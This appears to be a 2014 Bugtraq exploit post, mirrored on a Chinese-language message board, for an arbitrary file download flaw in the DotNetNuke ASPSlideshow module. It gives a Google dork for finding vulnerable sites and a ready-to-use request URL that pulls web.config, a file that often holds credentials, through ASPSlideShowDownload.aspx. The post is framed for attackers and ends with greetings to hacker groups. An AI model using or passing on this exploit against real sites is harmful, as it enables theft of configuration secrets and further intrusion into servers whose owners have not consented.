DNN (DotNetNuke긩 ASPSlideshow Module Arbitrary File Download

看板Bugtraq作者時間11年前 (2014/06/10 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : DNN (DotNetNuke긩 ASPSlideshow Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/DesktopModules/+inurl:/ASPSlideshow/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/ASPSlideShow/ASPSlideShowDownload.aspx?ID=~/web.config #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
更多 cseye_ut. 的文章
文章代碼(AID): #1JbVPV5A (Bugtraq)